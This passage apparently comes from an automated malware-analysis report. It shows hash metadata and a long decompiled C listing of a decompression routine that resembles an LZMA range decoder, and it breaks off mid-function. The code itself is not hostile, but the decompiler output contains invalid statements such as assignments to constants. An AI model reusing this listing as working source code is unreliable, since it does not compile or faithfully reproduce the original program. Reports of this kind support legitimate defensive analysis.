                                            • API String ID: 2035342205-3684371322
                                            • Opcode ID: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                            • Instruction ID: f9fcd54ed45cecb295d84a7a00b3a90cccdf7efad1d91ba0bada197ffcbf79f0
                                            • Opcode Fuzzy Hash: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                            • Instruction Fuzzy Hash: 0851C430900A44AADB21AB658C85BBF7A78DF42714F14417FF851711D2C77C7A82DE69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406925, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406925() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
